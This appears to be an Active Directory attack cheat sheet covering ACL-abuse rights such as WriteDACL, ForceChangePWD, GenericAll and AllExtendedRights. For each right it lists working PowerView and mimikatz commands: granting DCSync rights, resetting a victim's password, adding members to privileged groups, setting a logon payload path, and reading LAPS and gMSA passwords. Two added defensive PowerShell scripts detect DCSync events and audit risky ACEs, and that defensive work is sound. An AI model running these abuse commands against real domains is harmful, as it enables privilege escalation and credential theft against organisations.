
Security Descriptors

WriteDACL

info

Add an ACE to the DACL of an object.

Abuse

Add-ObjectACL -PrincipalIdentity <user> -Rights DCSync

Cleanup

Remove-DomainObjectACL
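A WriteDACL abuse on the domain object usually ends in a DCSync grant, and the use of that grant is visible to defenders: each replication request is logged on the domain controller as Security event 4662 carrying the control-access GUIDs of the replication rights. The PowerShell below is an added example, not code from the original page: it parses 4662 records and reports subjects outside an allow-list that exercised those rights. It assumes the Directory Service Access audit subcategory is enabled, that the domain object's SACL audits control-access operations, and that the allow-list is filled with the DC computer accounts (and any legitimate replication service account such as the directory-sync account). The sample record, the CORP\jdoe subject, the SID and the object GUID are constructed; the function names are assumptions.

```powershell
# Added example, not from the original page. The live query needs a DC's Security log
# (locally or via -ComputerName); the constructed sample at the end runs anywhere.

# Control-access right GUIDs that together make up "DCSync" (well-known values).
$ReplicationRightGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

function Get-EventDataField {
    # Read one <Data Name="..."> value from the record's EventData section.
    param([xml]$EventXml, [string]$Name)
    ($EventXml.Event.EventData.Data | Where-Object { $_.Name -eq $Name }).'#text'
}

function Test-ReplicationAccessEvent {
    # Return a summary object when the record is a 4662 that exercised a replication
    # right from a subject outside $AllowedSubject; otherwise return $null.
    param(
        [Parameter(Mandatory)][xml]$EventXml,
        [string[]]$AllowedSubject = @()   # assumption: 'CORP\DC01$' for each DC, sync accounts
    )
    $id = $EventXml.Event.System.EventID
    if ($id -is [System.Xml.XmlElement]) { $id = $id.'#text' }
    if ([int]$id -ne 4662) { return $null }

    $props = Get-EventDataField -EventXml $EventXml -Name 'Properties'
    $hits = foreach ($guid in $ReplicationRightGuids.Keys) {
        if ($props -match $guid) { $ReplicationRightGuids[$guid] }
    }
    if (-not $hits) { return $null }

    $domain  = Get-EventDataField -EventXml $EventXml -Name 'SubjectDomainName'
    $user    = Get-EventDataField -EventXml $EventXml -Name 'SubjectUserName'
    $subject = "$domain\$user"
    if ($AllowedSubject -contains $subject) { return $null }

    [pscustomobject]@{
        Time             = $EventXml.Event.System.TimeCreated.SystemTime
        DomainController = $EventXml.Event.System.Computer
        Subject          = $subject
        Rights           = ($hits -join ', ')
        AccessMask       = Get-EventDataField -EventXml $EventXml -Name 'AccessMask'
    }
}

function Get-ReplicationAccessEvent {
    # Pull recent 4662 records from a DC's Security log and filter them.
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$MaxEvents = 5000,
        [string[]]$AllowedSubject = @()
    )
    Get-WinEvent -ComputerName $ComputerName -FilterHashtable @{ LogName = 'Security'; Id = 4662 } `
                 -MaxEvents $MaxEvents -ErrorAction SilentlyContinue |
        ForEach-Object { Test-ReplicationAccessEvent -EventXml ([xml]$_.ToXml()) -AllowedSubject $AllowedSubject }
}

# Constructed sample record (not a real capture): a user account, not a DC, reading
# directory changes for the domain head. Real events carry the GUIDs in "Properties" this way.
$SampleEvent = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System>
    <Provider Name="Microsoft-Windows-Security-Auditing" />
    <EventID>4662</EventID>
    <TimeCreated SystemTime="2024-01-01T10:00:00.000000000Z" />
    <Computer>DC01.corp.example</Computer>
  </System>
  <EventData>
    <Data Name="SubjectUserSid">S-1-5-21-1111111111-2222222222-3333333333-1105</Data>
    <Data Name="SubjectUserName">jdoe</Data>
    <Data Name="SubjectDomainName">CORP</Data>
    <Data Name="ObjectServer">DS</Data>
    <Data Name="ObjectType">%{19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
    <Data Name="ObjectName">%{0c4ad16b-8a0c-4c63-9a1a-000000000001}</Data>
    <Data Name="OperationType">Object Access</Data>
    <Data Name="AccessList">%%7688</Data>
    <Data Name="AccessMask">0x100</Data>
    <Data Name="Properties">%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}</Data>
  </EventData>
</Event>
'@

Test-ReplicationAccessEvent -EventXml ([xml]$SampleEvent) -AllowedSubject 'CORP\DC01$' | Format-List
```

The sample yields one row for CORP\jdoe with both DS-Replication-Get-Changes rights; the same record from CORP\DC01$ would be dropped by the allow-list. Every DC replicates constantly, so the allow-list is what keeps this usable; a subject that is a plain user or a non-DC computer account is the finding to triage.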

ForceChangePWD

info

Change the password without knowing the current password.

Abuse

mimikatz lsadump::setntlm

1 - Connect as the user with the ForceChangePWD right (OPTIONAL)

$SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<domain>\<user>', $SecPassword)

2 - Change the password of the victim

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

AddMembers

info

Add a user, group or computer to a group.

Abuse

net group '<group>' <user> /domain /add
Add-DomainGroupMember -Identity '<group>' -Members <user>

Cleanup

net group '<group>' <user> /domain /delete
Remove-DomainGroupMember -Identity '<group>' -Members <user>

GenericAll

info

Full control over user and group objects.

Abuse

Add-DomainGroupMember -Identity '<group>' -Members <user>

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

Cleanup

Remove-DomainGroupMember -Identity '<group>' -Members <user>

Set-DomainObject <user> -Clear @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

GenericWrite

info

Write any property of an object.

Abuse

Add-DomainGroupMember -Identity '<group>' -Members <user>

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

Cleanup

Remove-DomainGroupMember -Identity '<group>' -Members <user>

Set-DomainObject <user> -Clear @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

WriteOwner

info

Change the owner of an object.

Abuse

Set-DomainObjectOwner -Identity <victim> -OwnerIdentity <controlled_user>

Cleanup

Set-DomainObjectOwner

AllExtendedRights

info

Ability to perform any "extended right" function.

If the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights are set on the domain object itself, the DCSync permission can be granted.

Abuse

Add-DomainGroupMember -Identity '<group>' -Members <user>

$UserPassword = ConvertTo-SecureString '<new_password>' -AsPlainText -Force
Set-DomainUserPassword -Identity <victim_user> -AccountPassword $UserPassword -Credential $Cred

Set-DomainObject <user> -Set @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose

Add-DomainObjectAcl -TargetIdentity <fqdn_domain> -PrincipalIdentity <user> -Rights DCSync -Verbose

Over a computer

Get-DomainComputer <computer_name> -Properties samaccountname,ms-mcs-admpwd
$gmsa = Get-ADServiceAccount -Identity '<user>' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
ConvertFrom-ADManagedPasswordBlob $mp # DSInternals module

Cleanup

Remove-DomainGroupMember -Identity '<group>' -Members <user>

Set-DomainObject <user> -Clear @{'mstsinitialprogram'='\\<share>\<payload.exe>'} -Verbose
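All of the sections above rely on ACEs that already sit in a DACL, so the defensive counterpart is to audit who holds them before they are used. The PowerShell below is an added example, not code from the original page: using the RSAT ActiveDirectory module and its AD: drive, it walks the DACL of chosen objects and maps each ACE to the right names used on this page (WriteDACL, ForceChangePWD, AddMembers via WriteProperty on member, GenericAll, GenericWrite, WriteOwner, AllExtendedRights and the DCSync replication rights), reporting any principal outside an allow-list. The allow-list, the objects audited in the usage lines and the Find-RiskyAce, Get-AceRiskLabel and Test-HasRight names are assumptions; the GUIDs are the well-known schema and control-access values.

```powershell
# Added example, not from the original page. Requires the RSAT ActiveDirectory module,
# which provides the AD: drive that Get-Acl reads. Allow-list and targets are assumptions.
Import-Module ActiveDirectory

$Rights = [System.DirectoryServices.ActiveDirectoryRights]

# Object-type GUIDs that narrow WriteProperty / ExtendedRight ACEs (well-known values).
$KnownObjectTypes = @{
    '00000000-0000-0000-0000-000000000000' = 'ALL'
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password'
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member'
}

function Test-HasRight {
    # True when every bit of $Wanted is present in $Granted.
    param($Granted, $Wanted)
    ($Granted -band $Wanted) -eq $Wanted
}

function Get-AceRiskLabel {
    # Map one ACE to the right name this page uses, or $null if it is not of interest.
    param([System.DirectoryServices.ActiveDirectoryAccessRule]$Ace)
    $r        = $Ace.ActiveDirectoryRights
    $type     = $Ace.ObjectType.ToString()
    $typeName = if ($KnownObjectTypes.ContainsKey($type)) { $KnownObjectTypes[$type] } else { $type }

    if (Test-HasRight $r ($Rights::GenericAll))   { return 'GenericAll' }
    if (Test-HasRight $r ($Rights::WriteDacl))    { return 'WriteDACL' }
    if (Test-HasRight $r ($Rights::WriteOwner))   { return 'WriteOwner' }
    if (Test-HasRight $r ($Rights::GenericWrite)) { return 'GenericWrite' }
    if ((Test-HasRight $r ($Rights::WriteProperty)) -and ($typeName -in 'ALL', 'member')) {
        return "WriteProperty($typeName)"         # 'member' is the AddMembers case
    }
    if (Test-HasRight $r ($Rights::ExtendedRight)) {
        if ($typeName -eq 'ALL') { return 'AllExtendedRights' }
        if ($KnownObjectTypes.ContainsKey($type)) { return "ExtendedRight($typeName)" }  # ForceChangePWD, DCSync parts
    }
    return $null
}

function Find-RiskyAce {
    # Audit the DACL of each object for the rights above, skipping expected principals.
    param(
        [Parameter(Mandatory)][string[]]$DistinguishedName,
        [string[]]$AllowedPrincipal = @(      # assumption: adjust to the environment
            'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators',
            "$env:USERDOMAIN\Domain Admins", "$env:USERDOMAIN\Enterprise Admins",
            "$env:USERDOMAIN\Domain Controllers", 'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS'
        )
    )
    foreach ($dn in $DistinguishedName) {
        $acl = Get-Acl -Path "AD:\$dn"
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($AllowedPrincipal -contains $ace.IdentityReference.Value) { continue }
            $label = Get-AceRiskLabel -Ace $ace
            if (-not $label) { continue }
            [pscustomobject]@{
                Object    = $dn
                Principal = $ace.IdentityReference.Value
                Right     = $label
                Inherited = $ace.IsInherited
                AppliesTo = $ace.InheritanceType
            }
        }
    }
}

# Usage (assumed targets): the domain head and the Users container. The owner is
# reported separately because WriteOwner abuse changes it rather than an ACE.
$domainDn = (Get-ADDomain).DistinguishedName
Find-RiskyAce -DistinguishedName $domainDn, "CN=Users,$domainDn" | Format-Table -AutoSize
"Owner of ${domainDn}: " + (Get-Acl -Path "AD:\$domainDn").Owner
```

Each row is either an ACE to remove (Remove-DomainObjectACL or the ADUC security tab) or one to record with its justification; ACEs that are not inherited and point at a single user account are the usual surprise. Run the audit against the domain head, the AdminSDHolder object and the OUs holding privileged accounts, and re-run it after any delegation change.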
